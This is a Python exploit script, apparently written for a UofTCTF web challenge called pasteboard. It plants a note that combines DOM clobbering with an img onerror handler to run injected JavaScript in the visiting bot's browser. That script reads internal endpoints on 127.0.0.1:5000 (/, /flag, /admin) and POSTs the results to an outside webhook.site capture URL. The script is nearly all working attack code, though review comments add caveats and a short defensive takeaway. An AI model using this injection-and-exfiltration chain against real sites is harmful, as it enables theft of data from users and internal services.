import requests

# Base URL of the target web application; the hostname suggests a UofTCTF
# challenge instance.
BASE_URL = "https://pasteboard-1fb68b7836775bea.chals.uoftctf.org"
# Third-party request-capture endpoint that receives the collected data.
# NOTE(review): WEBHOOK is never referenced in the visible script. The payload
# and the final hint each hard-code the same webhook ID, so editing this
# constant alone changes nothing.
WEBHOOK = "https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078"

# Note body submitted to the application. The markup has two elements:
#   * <form id="errorReporter"> holding <input name="path"> whose value is a
#     data:text/javascript URL. The id/name pair looks chosen to shadow a
#     global that the page's own script reads (DOM clobbering); presumably the
#     page loads `errorReporter.path` as a script. Verify against the app source.
#   * <img id="renderConfig" src=x onerror=...>: the handler sets
#     window.lastRenderError and throws. Presumably this pushes the page into
#     its error-reporting path; TODO confirm.
# The embedded script requests /, /flag and /admin on 127.0.0.1:5000, lists
# window property names containing "flag", and POSTs the first 500 characters
# of each result as JSON to the webhook path /ALLFETCH.
# NOTE(review): only the /flag and /admin fetches have a .catch(); a rejection
# of the first fetch rejects Promise.all and nothing is reported.
# NOTE(review): the "same-origin" assumption holds only if the visiting bot
# loads the note from http://127.0.0.1:5000; that is not shown in this script.
# Defensive takeaway (as far as this payload shows): a sanitizer that drops
# id/name attributes colliding with script globals, a CSP whose script-src
# allows neither data: URLs nor inline handlers, and isolating the bot from
# loopback services would each break one step of this chain.
payload = '''<form id="errorReporter"><input name="path" value="data:text/javascript,
Promise.all([
  fetch('http://127.0.0.1:5000/').then(r=>r.text()),
  fetch('http://127.0.0.1:5000/flag').then(r=>r.text()).catch(e=>'no flag'),
  fetch('http://127.0.0.1:5000/admin').then(r=>r.text()).catch(e=>'no admin'),
  'window: '+Object.keys(window).filter(k=>k.toLowerCase().includes('flag')).join(',')
]).then(results=>fetch('https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078/ALLFETCH',{method:'POST',body:JSON.stringify({home:results[0].substring(0,500),flag:results[1].substring(0,500),admin:results[2].substring(0,500),windowKeys:results[3]})}))
"></form>
<img id="renderConfig" src=x onerror="window.lastRenderError='x';throw new Error()">'''

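# Driver: store the payload as a note, then submit that note's path to the
# application's /report endpoint so the bot visits it.
print("[*] Trying to fetch internal endpoints from bot's perspective...")
print("[*] Will try: /, /flag, /admin")
print("[*] Also checking window object for flag-related keys")
print()

# requests applies no timeout by default, so an unresponsive server would
# block the script forever; bound every call explicitly.
REQUEST_TIMEOUT = 15  # seconds

try:
    # The context manager closes the session's pooled connections on exit.
    with requests.Session() as session:
        # Redirects are not followed so the 302's Location header can be read.
        resp = session.post(
            f"{BASE_URL}/note/new",
            data={"title": "Fetch Internal", "body": payload},
            allow_redirects=False,
            timeout=REQUEST_TIMEOUT,
        )
        location = resp.headers.get("Location")

        if resp.status_code != 302 or not location:
            # Without this branch a rejected note or a missing Location header
            # would pass silently (or yield a URL ending in "None").
            print(
                f"[-] Note creation failed: status={resp.status_code}, "
                f"Location={location!r}"
            )
        else:
            # Assumes Location is a path relative to BASE_URL - TODO confirm.
            note_url = f"{BASE_URL}{location}"
            print(f"[+] Created: {note_url}")

            # The report endpoint is given the relative path, not the full URL.
            report = session.post(
                f"{BASE_URL}/report",
                data={"url": location},
                timeout=REQUEST_TIMEOUT,
            )
            if report.status_code == 202:
                print("[+] Reported!")
                print()
                print("[*] Check webhook for POST to /ALLFETCH with JSON data")
                print("    https://webhook.site/#!/d8111fd3-599a-47ab-bcab-94d5ec54e078")
                print()
                print("[*] Look for the flag in the response body!")
            else:
                print(f"[-] Report was not accepted: status={report.status_code}")
except requests.RequestException as exc:
    # Covers connection errors and timeouts from either request.
    print(f"[-] Request failed: {exc}")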
